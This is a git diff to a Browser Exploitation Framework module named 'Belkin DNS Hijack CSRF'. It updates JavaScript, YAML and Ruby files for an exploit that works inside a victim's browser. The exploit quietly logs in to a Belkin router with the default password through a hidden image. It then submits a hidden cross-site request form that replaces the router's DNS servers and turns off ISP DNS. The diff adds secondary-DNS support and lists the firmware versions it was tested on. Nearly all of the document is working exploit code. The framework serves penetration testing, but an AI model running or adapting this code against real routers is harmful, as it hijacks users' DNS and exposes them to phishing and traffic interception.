diff --git a/modules/exploits/router/belkin_dns_csrf/command.js b/modules/exploits/router/belkin_dns_csrf/command.js index 87fa94203..a3dcf6a31 100644 --- a/modules/exploits/router/belkin_dns_csrf/command.js +++ b/modules/exploits/router/belkin_dns_csrf/command.js @@ -7,28 +7,48 @@ beef.execute(function() { // config - var gateway = '<%= @base %>'; - var path = '/cgi-bin/setup_dns.exe'; - var dns = '<%= @dns %>'; + var proto = 'http' + var rhost = '<%= @rhost %>'; + var dns1 = '<%= @dns1 %>'; + var dns2 = '<%= @dns2 %>'; var timeout = 15; - // validate DNS server IP address - var parts = dns.split('.'); + // validate primary DNS server IP address + var parts = dns1.split('.'); if (parts.length != 4) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } for (var i=0; i 255) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided"); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } } - var dns_1 = parts[0]; - var dns_2 = parts[1]; - var dns_3 = parts[2]; - var dns_4 = parts[3]; + var dns1_1 = parts[0]; + var dns1_2 = parts[1]; + var dns1_3 = parts[2]; + var dns1_4 = parts[3]; + + // validate secondary DNS server IP address + var parts = dns2.split('.'); + if (parts.length != 4) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + for (var i=0; i 255) { + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided"); + return; + } + + } + var dns2_1 = parts[0]; + var dns2_2 = parts[1]; + var dns2_3 = parts[2]; + var dns2_4 = parts[3]; // attempt auth with default password (admin) // incorrect login attempts do not log out an authenticated session @@ -37,24 +57,24 @@ beef.execute(function() { img.setAttribute("width", "0"); img.setAttribute("height","0"); img.id = 'belkin_auth_<%= @command_id %>'; - img.src = gateway+"/cgi-bin/login.exe?pws=admin"; + img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin"; document.body.appendChild(img); // change DNS - var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded", [ - {'type':'hidden', 'name':'dns1_1', 'value':dns_1}, - {'type':'hidden', 'name':'dns1_2', 'value':dns_2}, - {'type':'hidden', 'name':'dns1_3', 'value':dns_3}, - {'type':'hidden', 'name':'dns1_4', 'value':dns_4}, - {'type':'hidden', 'name':'dns2_1', 'value':dns_1}, - {'type':'hidden', 'name':'dns2_2', 'value':dns_2}, - {'type':'hidden', 'name':'dns2_3', 'value':dns_3}, - {'type':'hidden', 'name':'dns2_4', 'value':dns_4}, - {'type':'hidden', 'name':'dns2_1_t', 'value':dns_1}, - {'type':'hidden', 'name':'dns2_2_t', 'value':dns_2}, - {'type':'hidden', 'name':'dns2_3_t', 'value':dns_3}, - {'type':'hidden', 'name':'dns2_4_t', 'value':dns_4}, - {'type':'hidden', 'name':'auto_from_isp', 'value':'0'} + var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [ + {'type':'hidden', 'name':'dns1_1', 'value':dns1_1}, + {'type':'hidden', 'name':'dns1_2', 'value':dns1_2}, + {'type':'hidden', 'name':'dns1_3', 'value':dns1_3}, + {'type':'hidden', 'name':'dns1_4', 'value':dns1_4}, + {'type':'hidden', 'name':'dns2_1', 'value':dns2_1}, + {'type':'hidden', 'name':'dns2_2', 'value':dns2_2}, + {'type':'hidden', 'name':'dns2_3', 'value':dns2_3}, + {'type':'hidden', 'name':'dns2_4', 'value':dns2_4}, + {'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1}, + {'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2}, + {'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3}, + {'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4}, + {'type':'hidden', 'name':'auto_from_isp', 'value':'0'} // disable dns from ISP ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/belkin_dns_csrf/config.yaml b/modules/exploits/router/belkin_dns_csrf/config.yaml index d97357242..6e2aa3870 100644 --- a/modules/exploits/router/belkin_dns_csrf/config.yaml +++ b/modules/exploits/router/belkin_dns_csrf/config.yaml @@ -3,13 +3,15 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # +# Tested on F1PI242EGau_V1.00.002 and F1PI242EGau_V1.00.009 +# beef: module: belkin_dns_csrf: enable: true category: ["Exploits", "Router"] name: "Belkin DNS Hijack CSRF" - description: "Attempts to change the DNS setting on a Belkin router.

Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested." + description: "Attempts to change the DNS setting on a Belkin router.

Multiple models are affected, including F5D7230 and F1PI242EG." authors: ["bcoles"] target: - unknown: ["ALL"] + user_notify: ["ALL"] diff --git a/modules/exploits/router/belkin_dns_csrf/module.rb b/modules/exploits/router/belkin_dns_csrf/module.rb index 926f1eae9..5b0a20a06 100644 --- a/modules/exploits/router/belkin_dns_csrf/module.rb +++ b/modules/exploits/router/belkin_dns_csrf/module.rb @@ -2,15 +2,14 @@ # Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission -### -# This module has not been tested -### +# class Belkin_dns_csrf < BeEF::Core::Command def self.options return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, - {'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'} + {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.1.1.1'}, + {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'}, + {'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'} ] end